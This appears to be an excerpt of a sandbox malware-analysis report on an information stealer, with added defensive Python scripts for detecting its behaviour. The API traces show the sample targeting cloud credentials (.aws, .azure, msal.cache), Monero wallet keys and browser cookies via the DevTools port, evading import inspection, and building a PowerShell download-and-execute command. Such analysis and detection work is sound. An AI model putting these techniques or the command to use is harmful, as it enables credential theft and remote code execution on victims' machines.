                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: 95f0862ac65ecadd0658257954f205c3a97798a4127909abd3080043ea2e0523
                            • Instruction ID: 00b54060053633a0164c9eeb16739f8de794075995b29afe3a972754409bdb99
                            • Opcode Fuzzy Hash: 95f0862ac65ecadd0658257954f205c3a97798a4127909abd3080043ea2e0523
                            • Instruction Fuzzy Hash: A971D771E50339ABDB21EB64DC46FED7778AF58701F000895B619AB1C0DF709E888B94
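The two functions above give the defender concrete artifacts to watch. The first resolves the Monero wallet location from HKCU\SOFTWARE\monero-project\monero-core\wallet_path, appends ".keys", also tries a "\Monero\wallet.keys" path (the prefix is presumably the Documents folder; that is an inference), and copies the file with CopyFileA. The second calls SHGetFolderPathA with CSIDL 0x28 (CSIDL_PROFILE) to reach %USERPROFILE%\.azure\ and %USERPROFILE%\.aws\, and with CSIDL 0x1C (CSIDL_LOCAL_APPDATA) to reach \.IdentityService\ where msal.cache lives; the "Azure\.aws"-style strings are most likely the relative paths under which the copies are staged, which is also an inference. The following detection logic is an added example, not part of the Joe Sandbox report or of the sample: the path patterns come from the API listings, while the access records and the allowlist of processes expected to read each artifact are constructed for illustration and would be replaced by object-access auditing (Event ID 4663) or EDR file and registry telemetry in practice.

```python
"""Flag processes that touch the credential artifacts this sample harvests.

Added example, not part of the Joe Sandbox report or of the sample.  The target
patterns are reconstructed from the two functions above; the event records and
the allowlist of legitimate owner processes are constructed for illustration.
"""
import re

# CSIDL 0x28 is CSIDL_PROFILE (%USERPROFILE%), CSIDL 0x1C is CSIDL_LOCAL_APPDATA.
TARGET_PATTERNS = {
    "aws_credentials":    re.compile(r"\\\.aws\\", re.I),
    "azure_cli_tokens":   re.compile(r"\\\.azure\\", re.I),
    "msal_token_cache":   re.compile(r"\\\.IdentityService\\msal\.cache$", re.I),
    "monero_wallet_keys": re.compile(r"\\Monero\\[^\\]*\.keys$", re.I),
}
# Registry value the sample reads to locate a non-default wallet file.
MONERO_WALLET_PATH_KEY = r"HKCU\SOFTWARE\monero-project\monero-core\wallet_path"

# Processes expected to read each artifact.  Assumption: tune this to the estate.
EXPECTED_OWNERS = {
    "aws_credentials":        {"aws.exe", "terraform.exe"},
    "azure_cli_tokens":       {"python.exe"},            # Azure CLI runs inside python.exe
    "msal_token_cache":       {"code.exe", "devenv.exe"},
    "monero_wallet_keys":     {"monero-wallet-gui.exe", "monero-wallet-cli.exe"},
    "monero_wallet_path_reg": {"monero-wallet-gui.exe"},
}

# Constructed, simplified access records: (image, operation, target).
SAMPLE_EVENTS = [
    {"image": "aws.exe", "op": "read", "target": r"C:\Users\alice\.aws\credentials"},
    {"image": "monero-wallet-gui.exe", "op": "regquery", "target": MONERO_WALLET_PATH_KEY},
    {"image": "file.exe", "op": "regquery", "target": MONERO_WALLET_PATH_KEY},
    {"image": "file.exe", "op": "copy", "target": r"C:\Users\alice\Documents\Monero\wallet.keys"},
    {"image": "file.exe", "op": "read", "target": r"C:\Users\alice\.aws\credentials"},
    {"image": "file.exe", "op": "read", "target": r"C:\Users\alice\.azure\msal_token_cache.bin"},
    {"image": "file.exe", "op": "read", "target": r"C:\Users\alice\AppData\Local\.IdentityService\msal.cache"},
    {"image": "code.exe", "op": "read", "target": r"C:\Users\alice\AppData\Local\.IdentityService\msal.cache"},
]


def classify_target(op, target):
    """Map one access to an artifact class, or None if it is not of interest."""
    if op == "regquery":
        return "monero_wallet_path_reg" if target.lower() == MONERO_WALLET_PATH_KEY.lower() else None
    for label, pattern in TARGET_PATTERNS.items():
        if pattern.search(target):
            return label
    return None


def find_unexpected_access(events):
    """Return (image, artifact_class, target) for every access by a non-owner process."""
    hits = []
    for ev in events:
        label = classify_target(ev["op"], ev["target"])
        if label and ev["image"].lower() not in EXPECTED_OWNERS[label]:
            hits.append((ev["image"], label, ev["target"]))
    return hits


def rank_processes(hits):
    """Count distinct artifact classes per process.  A legitimate tool touches one
    class; a stealer sweeps wallet and cloud credentials in one run, so a process
    with several classes is the high-confidence finding."""
    classes = {}
    for image, label, _ in hits:
        classes.setdefault(image, set()).add(label)
    return sorted(((img, len(c)) for img, c in classes.items()), key=lambda x: -x[1])


if __name__ == "__main__":
    found = find_unexpected_access(SAMPLE_EVENTS)
    for image, label, target in found:
        print(f"{image:24} {label:24} {target}")
    print("ranked:", rank_processes(found))
```

With the constructed records only file.exe is reported, across all five artifact classes, while aws.exe, code.exe and the Monero GUI reading their own files produce nothing.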
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,001373E4), ref: 001449F6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00144A0C
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00144A1D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00144A2E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00144A3F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00144A50
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00144A61
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00144A72
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00144A83
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00144A94
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00144AA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous functions' Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: d41bf85e3790b720d50d76a56cd236852fab108a57bed2fee1ff5fa70ba11cd8
                            • Instruction ID: 7b4c76035cec332cc3e2510a4ad95f85d0cd702b4845d047dfdda8d5f18aecf0
                            • Opcode Fuzzy Hash: d41bf85e3790b720d50d76a56cd236852fab108a57bed2fee1ff5fa70ba11cd8
                            • Instruction Fuzzy Hash: BB113671952B60EBC7129BB4AC5EB5A3EBDBA09707B050C1BB961A71B0DBF44404EB50
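The function above loads ws2_32.dll with LoadLibraryA and resolves the ten WinSock routines it needs through GetProcAddress, so the import directory of the binary never mentions WinSock even though the code does raw TCP I/O. The side effect is that the export names survive as plain strings in the unpacked image. The following triage check is an added example, not part of the Joe Sandbox report: it takes a list of strings recovered from a memory dump and the DLL names from the import table and reports DLLs whose export names are present as strings without the DLL being imported. The API-name set is the one listed above; the string dump and import list are constructed.

```python
"""Spot WinSock APIs that are resolved at runtime instead of being imported.

Added example, not part of the Joe Sandbox report.  The API-name set is the one
the function above resolves with GetProcAddress after LoadLibraryA("ws2_32.dll");
the string dump and import list it is run against are constructed.
"""

WINSOCK_RUNTIME_APIS = frozenset({
    "WSAStartup", "WSACleanup", "socket", "connect", "send", "recv",
    "closesocket", "getaddrinfo", "freeaddrinfo", "htons",
})
# DLL -> export names that, seen as plain strings, indicate GetProcAddress resolution.
RUNTIME_RESOLUTION_TABLE = {"ws2_32.dll": WINSOCK_RUNTIME_APIS}

# Constructed strings as they would come out of the unpacked 00120000 image
# (the packed file on disk would not show them), plus the DLLs the report's
# API listing shows being imported normally.
SAMPLE_STRINGS = [
    "kernel32.dll", "lstrcpyA", "lstrcatA", "ws2_32.dll",
    "WSAStartup", "WSACleanup", "socket", "connect", "send", "recv",
    "closesocket", "getaddrinfo", "freeaddrinfo", "htons",
    "SOFTWARE\\monero-project\\monero-core", "wallet_path",
]
SAMPLE_IMPORTS = ["KERNEL32.dll", "ADVAPI32.dll", "SHELL32.dll", "SHLWAPI.dll", "MSVCRT.dll"]


def hidden_apis(strings, imported_dlls, table=RUNTIME_RESOLUTION_TABLE, min_hits=3):
    """Return {dll: sorted API names} for every DLL in `table` that is absent from
    the import directory while its name and at least `min_hits` of its export
    names appear as strings.  Run it on strings from the dumped image, since a
    packer hides them in the file on disk."""
    present = set(strings)
    present_lower = {s.lower() for s in present}
    imported = {d.lower() for d in imported_dlls}
    findings = {}
    for dll, apis in table.items():
        if dll.lower() in imported or dll.lower() not in present_lower:
            continue
        hits = sorted(api for api in apis if api in present)
        if len(hits) >= min_hits:
            findings[dll] = hits
    return findings


if __name__ == "__main__":
    for dll, apis in hidden_apis(SAMPLE_STRINGS, SAMPLE_IMPORTS).items():
        print(f"{dll}: resolved at runtime -> {', '.join(apis)}")
```

The `min_hits` floor keeps a single stray "send" or "socket" string from producing a finding; a real stealer resolves the whole connect/send/recv set, as this one does.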
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013BFA3
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013BFD6
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0013BFE1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013C001
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0013C00D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C030
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013C03B
                            • lstrlen.KERNEL32(')"), ref: 0013C046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C063
                            • lstrcat.KERNEL32(00000000,')"), ref: 0013C06F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C096
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0013C0B6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013C0D8
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0013C0E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013C10A
                            • ShellExecuteEx.SHELL32(?), ref: 0013C15C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous functions' Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 82110069cb1d7e7506d02e49de4b6a0040a0d307b05b17aa5339cea262fee0ab
                            • Instruction ID: de405a71c95b1d19e59b97393fd02c5cb3b89891851254d5ebd865ff315bb0f5
                            • Opcode Fuzzy Hash: 82110069cb1d7e7506d02e49de4b6a0040a0d307b05b17aa5339cea262fee0ab
                            • Instruction Fuzzy Hash: A361B330E11366EBCB22AFB4AC8A6AF7BB9AF15305F041425F815F7261DB34C9558BD0
                            APIs
                            • lstrcpy.KERNEL32 ref: 0013AD1F
                            • lstrlen.KERNEL32(013FE298), ref: 0013AD35
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AD5D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AD91
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013ADD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013ADDE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE07
                            • lstrlen.KERNEL32(00154ADC), ref: 0013AE21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE43
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0013AE4F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AE78
                            • lstrlen.KERNEL32(00154ADC), ref: 0013AE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AEAC
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0013AEB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AEE1
                            • lstrlen.KERNEL32(013FE2C8), ref: 0013AEF7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AF1F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AF2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AF53
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013AF8F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013AF99
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013AFBF
                            • lstrlen.KERNEL32(00000000), ref: 0013AFD5
                            • lstrcpy.KERNEL32(00000000,013FE1C0), ref: 0013B008
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous functions' Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID:
                            • API String ID: 2762123234-0
                            • Opcode ID: 3bd7b8b5ae183815e382a722f11d69096af09d4b0fcf996b9c3f9e0a21d3a36b
                            • Instruction ID: 4efff4c2a3c8bf74ffb9ae5763207e5406d3ae8c4c80017f6a121a698c13a845
                            • Opcode Fuzzy Hash: 3bd7b8b5ae183815e382a722f11d69096af09d4b0fcf996b9c3f9e0a21d3a36b
                            • Instruction Fuzzy Hash: B1B1CC30910636EBCB22EFA8EC49BAFB7B9AF14305F440525F841A7A64DB30DD11CB91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141A1F
                            • lstrlen.KERNEL32(013E61B0), ref: 00141A30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141A57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141A62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141A91
                            • lstrlen.KERNEL32(00154FA4), ref: 00141AA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141AC4
                            • lstrcat.KERNEL32(00000000,00154FA4), ref: 00141AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141AFF
                            • lstrlen.KERNEL32(013E5FF0), ref: 00141B15
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141B3C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141B47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141B76
                            • lstrlen.KERNEL32(00154FA4), ref: 00141B88
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141BA9
                            • lstrcat.KERNEL32(00000000,00154FA4), ref: 00141BB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141BE4
                            • lstrlen.KERNEL32(013E6000), ref: 00141BFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C21
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141C2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C5B
                            • lstrlen.KERNEL32(013E6010), ref: 00141C71
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141C98
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141CA3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141CD2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous functions' Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 39404de532ef3f41fe3d01db383d9210c6ef5ced4231c4f96032cea928bf7d7e
                            • Instruction ID: f25eca5e0db1cb9673f5ca94946b2db735f69d1832363a82f3a41caa64da6491
                            • Opcode Fuzzy Hash: 39404de532ef3f41fe3d01db383d9210c6ef5ced4231c4f96032cea928bf7d7e
                            • Instruction Fuzzy Hash: 1F914DB0601713EBDB21AFB5DC89A1AB7FCEF18305F145829E896D3661DB34D9818B60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 001348F3
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00134925
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134972
                            • lstrlen.KERNEL32(00154B68), ref: 0013497D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013499A
                            • lstrcat.KERNEL32(00000000,00154B68), ref: 001349A6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001349CB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001349F8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134A03
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134A2A
                            • StrStrA.SHLWAPI(?,00000000), ref: 00134A3C
                            • lstrlen.KERNEL32(?), ref: 00134A50
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134A91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B18
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B41
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B6A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134B90
                            • lstrcpy.KERNEL32(00000000,?), ref: 00134BBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: the same 16 associated memory dumps as listed under the previous functions' Memory Dump Source
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: a6931e1e8e7b2ea481bf538cb9adf4899ac656396588e24a1f29694856f392a3
                            • Instruction ID: 1b35940a60bd1fe7dded4993fc5bd857babad59b652806e3372477452118a596
                            • Opcode Fuzzy Hash: a6931e1e8e7b2ea481bf538cb9adf4899ac656396588e24a1f29694856f392a3
                            • Instruction Fuzzy Hash: 0BB1B631A11326ABCF21EF78E846AAF77B9AF54304F041128FC46A7625DB30EC158BD0
                            APIs
                              • Part of subcall function 001290C0: InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 001290DF
                              • Part of subcall function 001290C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 001290FC
                              • Part of subcall function 001290C0: InternetCloseHandle.WININET(00000000), ref: 00129109
                            • strlen.MSVCRT ref: 001292E1
                            • strlen.MSVCRT ref: 001292FA
                              • Part of subcall function 00128980: std::_Xinvalid_argument.LIBCPMT ref: 00128996
                            • strlen.MSVCRT ref: 00129399
                            • strlen.MSVCRT ref: 001293E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00129547
                            • lstrcat.KERNEL32(?,0015179C), ref: 00129559
                            • lstrcat.KERNEL32(?,?), ref: 0012956A
                            • lstrcat.KERNEL32(?,00154BA0), ref: 0012957C
                            • lstrcat.KERNEL32(?,?), ref: 0012958D
                            • lstrcat.KERNEL32(?,.txt), ref: 0012959F
                            • lstrlen.KERNEL32(?), ref: 001295B6
                            • lstrlen.KERNEL32(?), ref: 001295DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00129614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: d3897db0745e77dec51903cdadfbd0475889115d05df6daed4e0c03c9a919e08
                            • Instruction ID: ebec02b37e3bb80623299e547e5891a9fe73a13f77158fd325fa1842316572a1
                            • Opcode Fuzzy Hash: d3897db0745e77dec51903cdadfbd0475889115d05df6daed4e0c03c9a919e08
                            • Instruction Fuzzy Hash: 85E14970E10228EFDF10DFA8E891ADDBBB5BF58301F1045A9E509A7281DB309E95CF90
                            APIs
                            • memset.MSVCRT ref: 0013DB91
                            • memset.MSVCRT ref: 0013DBA3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013DBCB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013DBFE
                            • lstrcat.KERNEL32(?,00000000), ref: 0013DC0C
                            • lstrcat.KERNEL32(?,013FE400), ref: 0013DC26
                            • lstrcat.KERNEL32(?,?), ref: 0013DC3A
                            • lstrcat.KERNEL32(?,013FD328), ref: 0013DC4E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013DC7E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013DC85
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013DCEE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 596463d260d7e1b384046494b05052786b5ae68517a52444bf37f96d6c4cc74f
                            • Instruction ID: 478840c746cc048735ba9e923546d1cd1fa594bd6142918785c74be1f2267b74
                            • Opcode Fuzzy Hash: 596463d260d7e1b384046494b05052786b5ae68517a52444bf37f96d6c4cc74f
                            • Instruction Fuzzy Hash: B5B19D71D10269AFCB11EFB4EC859EEBBB9FF58300F144969E906A7250DB309E54CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B3D9
                            • lstrlen.KERNEL32(00154C54), ref: 0012B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B474
                            • lstrcat.KERNEL32(00000000,00154C54), ref: 0012B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B4A9
                            • lstrlen.KERNEL32(00000000), ref: 0012B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B587
                            • lstrlen.KERNEL32(00154ADC), ref: 0012B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B622
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 0012B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B65E
                            • lstrlen.KERNEL32(?), ref: 0012B767
                            • lstrlen.KERNEL32(?), ref: 0012B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012B79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: ab5d519073e67c61c8fd869b3a90e3ed9dde82b0363dcf223ba6972ebe204cfb
                            • Instruction ID: ff3c39c8d1030f84a446c4a860a163dec8ec64a06558bec156f8baa18f83d120
                            • Opcode Fuzzy Hash: ab5d519073e67c61c8fd869b3a90e3ed9dde82b0363dcf223ba6972ebe204cfb
                            • Instruction Fuzzy Hash: 17025F30A05626DFCB25DF64E9C9B6EB7F5BF44305F188069E8099B2A2D735DC52CB80
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • RegOpenKeyExA.ADVAPI32(?,013FB120,00000000,00020019,?), ref: 0014398D
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 001439C7
                            • wsprintfA.USER32 ref: 001439F2
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00143A10
                            • RegCloseKey.ADVAPI32(?), ref: 00143A1E
